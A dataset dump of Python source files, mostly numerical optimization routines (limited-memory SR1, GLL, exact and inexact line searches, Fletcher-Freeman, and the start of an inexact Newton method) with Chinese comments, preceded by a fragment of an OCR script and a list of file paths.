boxes,scores = detect_lines(image,scale=scale,maxScale=maxScale)
data =[]
n = len(boxes)
for i in range(n):
box = boxes[i]
box = [int(x) for x in box]
if scores[i]>TEXT_LINE_SCORE:
data.append({'box':box,'prob':round(float(scores[i]),2),'text':None})
res = {'data':data,'errCode':0}
else:
res = {'data':[],'errCode':3}
return res
result=job(sys.argv[1])
print(json.dumps(result))
|
[
"/cnocr/cnocr/__init__.py",
"/cnocr/cnocr/cn_ocr.py",
"/cnocr/cnocr/consts.py",
"/cnocr/cnocr/fit/fit.py",
"/cnocr/cnocr/utils.py",
"/cnocr/scripts/cnocr_train.py",
"/cnocr/tests/test_cnocr.py",
"/cnocr/tests/test_mxnet.py",
"/cnocr/upload.py",
"/darknet-ocr/config.py",
"/darknet-ocr/dnn/ocr.py",
"/darknet-ocr/region.py"
] |
0000duck/Optimization-Theory-and-Methods
|
import numpy as np
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import Newton_Methods.fletcher_freeman as FF
import Newton_Methods.newton_method as nm
from goto import with_goto
import logging
import functions
import copy
import time
import utils
from queue import Queue
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
"""
We note, however, that
limited-memory SR1 updating is sometimes not as effective as L-BFGS updating because it
may not produce positive definite approximations near a solution.
即相比于BFGS,SR1要慢很多
"""
@with_goto
def CLSR1(X, func, gfunc, hyper_parameters=None, M = 15, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
""" 压缩形式的有限内存SR1方法
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (json): 超参数,超参数中包括:
M (int, optional): [计算修正Hk的时候,需要之前记录的M个信息,记录的信息包括s和y], 要求M的取值范围在[5, 9, 15]. Defaults to 15.
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
epsilon ([float], optional): [||g_k|| < 1e-5 * max(1, ||x_k||)时,迭代结束]. Defaults to 1e-8.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
"""
if hyper_parameters is not None:
M = hyper_parameters["LSR1"]["M"]
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
n = len(X)
k = 1
function_k = 0
func_values = [] # 记录每一步的函数值,在GLL中有用
mk = 0 # GLL当中的mk初始值
Sk_que = Queue() # 记录最多M个s_k,LSR1修正Hk时有用
Yk_que = Queue() # 记录最多M个y_k,LSR1修正Hk时有用
Dk_que = Queue() # 记录最多M个s^T * y
g = gfunc(X)
F = func(X)
function_k += 1
func_values.append(F)
start_time = time.time()
#计算下降方向d_k,这一步包括使用压缩形式修正Hk,和计算dk = -Hk * gk
label .count_dk
# if len(p_history) > 0:
# mu = ((s_history[-1] @ y_history[-1])/ (y_history[-1] @ y_history[-1]))
# else:
# mu = 1
Hk = np.eye(n, dtype=float)
item_num = min(Sk_que.qsize(), M)
if item_num > 0:
Sk = np.mat(Sk_que.queue).T
Yk = np.mat(Yk_que.queue).T
Lk = np.zeros((item_num, item_num), dtype=float)
for i in range(item_num):
for j in range(i):
Lk[i][j] = Sk_que.queue[i] @ Yk_que.queue[j]
Dk = np.diag(Dk_que.queue)
mid_mat = Dk + Lk + Lk.T - (Yk.T @ Hk @ Yk)
try:
# 有可能之间的矩阵不可逆
mid_mat_inv = np.linalg.inv(mid_mat)
except:
logger.info("修正Hk时,中间的矩阵不可逆,用修正Cholesky分解")
L, D = utils.modified_Cholesky(mid_mat, hyper_parameters["modified_Cholesky"])
mid_mat_ = utils.get_modified_G(L, D)
mid_mat_inv = np.linalg.inv(mid_mat_)
Hk = Hk + (Sk - Hk @ Yk) @ mid_mat_inv @ (Sk - Hk @ Yk).T
d = np.squeeze(np.array(-Hk @ g))
before_LS_time = time.time()
#求得下降方向之后,此后的步骤与其他优化方法无异
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
logger.info("当前更新的步长为{}".format(alpha_star))
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
func_values.append(func_X_new)
g_new = gfunc(X_new)
if item_num == M:
Sk_que.get()
Yk_que.get()
Dk_que.get()
Sk_que.put(d * alpha_star)
Yk_que.put(g_new - g)
Dk_que.put((d * alpha_star) @ (g_new - g))
# 更新
logging.info("g is {}".format(g_new))
logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g_new), xk = epsilon * max(1, np.linalg.norm(X_new))))
# 给出的终止条件可能存在一些问题,由于编程语言进度的限制,g的下降量可能为0,从而计算 rho的时候可能存在除0的情况
if np.linalg.norm(g_new) < epsilon * max(1, np.linalg.norm(X_new)):
# if abs(func_X_new - F) <= epsilon:
end_time = time.time()
logger.info("因为满足终止条件,{mode}的有限内存BFGS方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
if k > max_epoch:
end_time = time.time()
logger.info("超过最大迭代次数,{mode}的有限内存BFGS方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
X = X_new
g = g_new
F = func_X_new
k += 1
goto .count_dk
if __name__ == '__main__':
CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
ILS_criterion = CRITERION[0]
ELS_LSR1_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 1,
"r": 1e-7,
"t": 5,
},
"golden_method": {
"epsilon": 1e-7,
}
},
"LSR1": {
"M": 15,
},
"modified_Cholesky": {
"u": 1e-50,
},
"search_mode": "ELS",
"epsilon": 1e-5,
"max_epoch": 1000,
}
ILS_LSR1_hyper_parameters = {
"ILS": {
"rho": 0.2,
"sigma": 0.4,
"t": 1.5,
"alpha0": 1e-6,
"criterion": ILS_criterion
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-50,
},
"LSR1": {
"M": 15,
},
"search_mode": "ILS",
"epsilon": 1e-5,
"max_epoch": 1000,
}
GLL_LSR1_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.4,
"M": 3,
"a": 1,
},
"modified_Cholesky": {
"u": 1e-50,
},
"LSR1": {
"M": 15,
},
"search_mode": "GLL",
"epsilon": 1e-5,
"max_epoch": 1000,
}
M = [5, 9, 15]
N = 1000
for n in [N]:
# logger.info("Penalty1 函数")
# x0 = np.array(range(1, n + 1))
# penalty1 = functions.Penalty1(n)
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
# logger.info("M={}的LSR1法".format(M[0]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
# logger.info("M={}的LSR1法".format(M[1]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
# logger.info("M={}的LSR1法".format(M[2]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, penalty1.func, penalty1.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
logger.info("Extended_Freudenstein_Roth 函数")
x0 = np.array([-2.] * n)
EFR = functions.Extended_Freudenstein_Roth(n)
ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
logger.info("M={}的LSR1法".format(M[0]))
X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
# logger.info("M={}的LSR1法".format(M[1]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
# logger.info("M={}的LSR1法".format(M[2]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, EFR.func, EFR.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# logger.info("Extended_Rosenbrock 函数")
# ER = functions.Extended_Rosenbrock(n)
# x0 = np.zeros(n)
# t = np.array(range(int(n / 2)))
# x0[2 * t] = -1.2
# x0[2 * t + 1] = 1
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
# logger.info("M={}的LSR1法".format(M[0]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
# logger.info("M={}的LSR1法".format(M[1]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[2]
# logger.info("M={}的LSR1法".format(M[2]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, ER.func, ER.gfunc, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[2], round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# logger.info("Trigonometric 函数")
# x0 = np.array([1/n] * int(n))
# f_funciton = functions.trigonometric
# g_function = functions.g_trigonometric
# G_function = functions.G_trigonometric
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[0]
# logger.info("M={}的LSR1法".format(M[0]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, f_funciton, g_function, hyper_parameters=ILS_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[0], format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_LSR1_hyper_parameters["LSR1"]["M"] = M[1]
# logger.info("M={}的LSR1法".format(M[1]))
# X_star, func_X_star, iter_num, function_num, cpu_time = CLSR1(x0, f_funciton, g_function, hyper_parameters=GLL_LSR1_hyper_parameters)
# logger.info("压缩LSR1 & M={} & {} & {} & {} & {} & 是 \\\\".format(M[1], format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
--- FILE SEPARATOR ---
from goto import with_goto
def GLL_search(func, gfunc, X, d, func_values, last_m, hyper_parameters=None, M=10, a=10**5, sigma=0.5, rho=0.5):
""" 非单调线搜索GLL准则
Args:
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
X ([np.array]]): [初值点]
d ([np.array]]): [下降方向]
func_values ([np.array]]): [之前步的函数值]
last_m ([int]]): [m(k-1)]
hyper_parameters: (Dic): 超参数,超参数中包括:
M (int, optional): [用于限制m(k)上限的参数]. Defaults to 10.
a (int, optional): [初始步长]. Defaults to 0.5.
sigma (int, optional): [用于确定初始步长的在0到1之间的系数]. Defaults to 0.5.
rho (float, optional): [GLL准则当中的参数]. Defaults to 0.1.
Returns:
[float]: [搜索得到的步长]]
"""
if hyper_parameters is not None:
rho = hyper_parameters["rho"]
sigma = hyper_parameters["sigma"]
M = hyper_parameters["M"]
a = hyper_parameters["a"]
# alpha = hyper_parameters["alpha0"]
mk = min(last_m + 1, M) #原方法中是<=,如果是<=的话,mk怎么取
func_k = 0 # 函数调用次数
gf0 = gfunc(X)
gkdk = gf0.dot(d)
max_fx = max(func_values[-mk:])
hk = 0
while True:
alpha = sigma ** hk * a
func_k += 1
if func(X + alpha * d) <= max_fx + rho * alpha * gkdk:
return alpha, func_k, mk
else:
hk += 1
--- FILE SEPARATOR ---
import numpy as np
from goto import with_goto
import copy
import functions
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logger = logging.getLogger(__name__)
@with_goto
def retreat_method(func, X, d, hyper_parameters=None, a0=1e-4, r=1e-5, t=1.5):
"""进退法确定初始步长搜索区间 《数值最优化方法》 高立著 p26
Args:
func ([函数对象]): [目标函数]
X ([np.array]]): [初值点]
d ([np.array]]): [下降方向]
a0 ([float]]): [初始步长]
hyper_parameters: (Dic): 超参数,超参数中包括:
r ([float]): [步长更新的步长]
t ([float]): [>1的放大率]]
"""
if hyper_parameters is not None:
r = hyper_parameters["r"]
t = hyper_parameters["t"]
#步1
assert a0 >=0 and r > 0 and t > 1, "must have a0 >=0 , r > 0 , t > 1"
i = 0
alpha = a0
a_pre = a0
just_change_direction_flag = False
func_k = 1
func_pre = func(X + d * a_pre)
#步2
label .step2
a_cur = a_pre + r
if a_cur <= 0:
a_cur = 0
goto .step4
func_k += 1
func_cur = func(X + d * a_cur)
if func_pre <= func_cur:
# 可能会存在两个方向均是不是下降方向的情况
if just_change_direction_flag:
logger.info("在精确线搜索中,两个方向均是不是下降方向")
return a_pre, a_pre, func_k
#转步4
goto .step4
#步3
r = t * r
alpha = a_pre
a_pre = a_cur
func_pre = func_cur
i += 1
goto .step2
label .step4
if i == 0:
r = -r
alpha = a_cur
just_change_direction_flag = True
#转步2
goto .step2
else:
return min(alpha, a_cur), max(alpha, a_cur), func_k
@with_goto
def golden_method(func, X, d, a0, b0, hyper_parameters=None, epsilon=1e-5, tau=0.618):
"""0.618法确定函数近似极小点 《最优化理论与方法》 袁亚湘著 p71
Args:
func ([函数对象]): [目标函数]
X ([np.array]]): [初值点]
d ([np.array]]): [下降方向]
a0 ([float]]): [步长区间下界]
b0 ([float]]): [步长区间上界]
hyper_parameters: (Dic): 超参数,超参数中包括:
epsilon ([float]): [终止条件阈值]
tau ([float]): [0.618]]
"""
if hyper_parameters is not None:
epsilon = hyper_parameters["epsilon"]
if a0 == b0:
return a0, 0
assert b0 > a0 and epsilon > 0, "must have b0 > a0, epsilon > 0"
a, b = a0, b0
#步1
al = a + (1 - tau) * (b -a)
ar = a + tau * (b - a)
func_k = 2
f_al = func(X + d * al)
f_ar = func(X + d * ar)
#步2
label .step2
if f_al <= f_ar:
goto .step4
#步3
if b - al <= epsilon:
return ar, func_k
else:
a = al
al = ar
f_al = f_ar
ar = a + tau * (b - a)
func_k += 1
f_ar = func(X + d * ar)
goto .step2
#步4
label .step4
if ar - a <= epsilon:
return al, func_k
else:
b = ar
ar = al
f_ar = f_al
al = a + (1 - tau) * (b - a)
func_k += 1
f_al = func(X + d * al)
goto .step2
--- FILE SEPARATOR ---
import numpy as np
from goto import with_goto
import copy
import functions
import functools
def inexact_line_search(func, gfunc, X, d, hyper_parameters=None, rho=0.1, sigma=0.4, criterion='Armijo Goldstein', start=0, end=1e10, alpha0=1e-6, t=5, appendix=False):
"""[summary]
Args:
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
X ([np.array]]): [初值点]
d ([np.array]]): [下降方向]
start (int, optional): [步长下界]. Defaults to 0.
end ([type], optional): [步长上界]. Defaults to 1e10.
hyper_parameters: (Dic): 超参数,超参数中包括:
rho (float, optional): [Armijo准则中的参数]. Defaults to 0.1, range in (0, 1/2).
sigma (float, optional): [Wolfe准则中的参数]. Defaults to 0.4, range in (rho, 1).
criterion (str, optional): [准则名称]. Defaults to 'Wolfe Powell'. 从["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]中选择
alpha0 (float, optional): 初始步长. Defaults to 1e-6
appendix (bool, optional): [description]. Defaults to False.
Returns:
[float]: [搜索得到的步长]]
"""
if hyper_parameters is not None:
rho = hyper_parameters["rho"]
sigma = hyper_parameters["sigma"]
criterion = hyper_parameters["criterion"]
alpha = hyper_parameters["alpha0"]
else:
alpha = alpha0
# if appendix == True:
# alpha0 = (start + end) / 2 # save initial point
# reduce unnecessary caculations in loop
func_k = 1
f0, gf0 = func(X), gfunc(X)
# gf0 must be a numpy array
gkdk = gf0.dot(d)
wolfe_boundary = sigma * gkdk
strong_wolfe_boundary = sigma * abs(gkdk)
iter_num = 0
while True:
func_k += 1
fAlpha, gfAlpha = func(X + alpha * d), gfunc(X + alpha * d)
if abs(start - end) < 1e-15:
alpha_star = alpha
min_value = fAlpha
break
armijo_boundary = f0 + rho * gkdk * alpha
goldstein_boundary = f0 + (1 - rho) * gkdk * alpha
gkAlpha_dk = gfAlpha.dot(d)
# different criterions have same condition1 to avoid too large alpha
armijo_condition = (fAlpha <= armijo_boundary)
# different criterions have different condition2 to avoid too small alpha
if criterion == 'Armijo Goldstein':
condition2 = (fAlpha >= goldstein_boundary)
elif criterion == 'Wolfe Powell':
condition2 = (gkAlpha_dk >= wolfe_boundary)
elif criterion == 'Strong Wolfe Powell':
condition2 = (abs(gkAlpha_dk) <= strong_wolfe_boundary)
else:
condition2 = True
# update start or end point or stop iteration
if armijo_condition == False:
end = alpha
alpha = (start + end) / 2
elif condition2 == False:
# elif alpha < minstep:
start = alpha
if end < 1e10:
alpha = (start + end) / 2
else:
alpha = t * alpha
else:
alpha_star = alpha
min_value = fAlpha
break
iter_num += 1
if appendix == True:
print("方法:非精确线搜索;准则:%s\n" % criterion)
print("初始步长:%.2f" % (alpha0))
print("初始点函数值:%.2f" % (f0))
print("停止步长:%.4f; 停止点函数值:%.4f; 迭代次数:%d" % (alpha_star, min_value, iter_num))
return alpha_star, func_k
def test():
x0 = np.array([-3, -1, -3, -1])
d0 = np.array([2, 1, 2, 1])
diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
alpha_star = inexact_line_search(functions.wood, g_wood_partial, x0, d0, appendix=True)
print(functions.wood(x0 + d0 * alpha_star))
def main():
test()
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
from goto import with_goto
import utils
import numpy as np
import functions
import functools
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import logging
import time
import copy
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logger = logging.getLogger(__name__)
def descent_by_general_inverse(X, L, D, gfunc):
""" 方法b:使用广义逆计算D的特征值有负值情况下的下降方向
Args:
X ([np.array]): Input X
L ([np.array]): BP or LDLT分解成的L
D ([np.array]): BP or LDLT分解成的D
gfunc ([回调函数]): [目标函数的一阶导函数]
"""
n = len(D)
D_plus = np.zeros((n ,n))
i = 0
while i < n:
if i < n - 1 and D[i + 1][i] != 0: #2 * 2的块
eigenvalue, eigenvector = np.linalg.eig(D[i: i + 2, i: i + 2])
positive_value_idx = np.where(eigenvalue > 0)[0]
D_plus[i: i + 2, i: i + 2] = np.dot((eigenvector[positive_value_idx] / eigenvalue[positive_value_idx]).reshape(2,1), eigenvector[positive_value_idx].reshape(1,2))
i += 2
else: # 1 * 1的块
D_plus[i][i] = 0 if D[i][i] <= 0 else 1 / D[i][i]
i += 1
L_inverse = np.mat(np.linalg.inv(L))
descent = -L_inverse.T * np.mat(D_plus) * L_inverse * gfunc(X).reshape(n, 1)
return np.array(descent)
@with_goto
def Fletcher_Freeman(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
"""Fletcher_Freeman方法求极小值点
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (json): 超参数,超参数中包括:
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
epsilon ([float], optional): [当函数值下降小于epsilon,迭代结束]. Defaults to 1e-5.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
k = 1
function_k = 0
func_values = [] #记录每一步的函数值,在GLL中有用
mk = 0 #GLL当中的mk初始值
label .step2
G = hess_func(X)
function_k += 1
F = func(X)
func_values.append(F)
L, D, y = utils.Bunch_Parlett(G)
n = len(X)
# 根据D的特征值正负性的不同情况,分情况计算下降方向d
eigenvalue, eigenvector = np.linalg.eig(D)
# 特征值中有负值
if np.any(eigenvalue < 0):
logger.info("特征值中有负值")
d = np.squeeze(descent_by_general_inverse(X, L, D, gfunc))
elif np.any(eigenvalue == 0): # 特征值中既有正值又有零
logger.info("特征值中既有正值又有零")
d = descent_by_general_inverse(X, L, D, gfunc)
if np.where(d != 0)[0].shape[0] == 0:
G_modified = np.dot(np.dot(L, D), L.T)
right_zero = np.zeros(n)
descent_list = np.linalg.solve(G, right_zero)
# descent_list = np.linalg.solve(G, right_zero)
for descent in descent_list:
if gfunc(X) @ descent < 0: # 判断哪一个dk,使得gkdk小于0,把dk为0向量的情况排除出去
d = descent
break
else:
logger.info("特征值全为正")
G_modified = np.dot(np.dot(L, D), L.T)
inv_hass = np.linalg.inv(G)
# inv_hass = np.linalg.inv(G)
d = -np.dot(inv_hass , gfunc(X))
#求得下降方向之后,此后的步骤与GM稳定牛顿法无异
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
else:
raise ValueError("参数search_mode 必须从['ELS', 'ILS']当中选择")
# logging.info("线搜索结束")
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
if abs(func_X_new - F) <= epsilon:
logger.info("因为函数值下降在{epsilon}以内,{mode}的FF方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, mode=search_mode, iter=k, func_k=function_k,X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k
if k > max_epoch:
logger.info("超过最大迭代次数:%d", max_epoch)
return X_new, func_X_new, k, function_k
X = X_new
k += 1
goto .step2
if __name__ == '__main__':
x0 = np.array([-3, -1, -3, -1])
d0 = np.array([2, 1, 2, 1])
diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
G_wood_partial = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
# logger.info("精确线搜索下的FF方法")
# Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
# logger.info("非精确线搜索下的FF方法")
# Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
logger.info("GLL线搜索下的FF方法")
Fletcher_Freeman(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import time
from goto import with_goto
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import utils
import functools
import copy
from scipy.sparse.linalg import gmres
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def inexact_newton_method(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ILS", eta_mode=1, safeguard=True, eta0=0.5, gamma=1, sigma=1.5, epsilon=1e-5, max_epoch=1000):
"""[使用非精确牛顿法极小值点
d = -G_k^{-1} * g_k]
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
eta_mode (int, optional): [{eta}选择的方式]. Defaults to 1. [1, 2]
eta0 ([float], optional): [eta的初值]. Defaults to 0.5.
gamma ([float], optional): [eta选择2当中的系数参数]. Defaults to 1.
sigma ([float], optional): [eta选择2当中的指数参数]. Defaults to 1.5.
safeguard ([bool], optional): [是否使用安全保护]. Defaults to True.
epsilon ([float], optional): [||g_k|| < 1e-5 * max(1, ||x_k||)时,迭代结束]. Defaults to 1e-8.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
eta_mode = hyper_parameters["INM"]["eta_mode"]
eta0 = hyper_parameters["INM"]["eta0"]
safeguard = hyper_parameters["INM"]["safeguard"]
if eta_mode == 2:
gamma = hyper_parameters["INM"]["gamma"]
sigma = hyper_parameters["INM"]["sigma"]
n = len(X)
k = 1
function_k = 0
func_values = [] # 记录每一步的函数值,在GLL中有用
mk = 0 # GLL当中的mk初始值
g_pre = None
G_pre = None
d_pre = None
g = gfunc(X)
G = hess_func(X)
eta_pre = None
# 把当前函数值加入func_values
F = func(X)
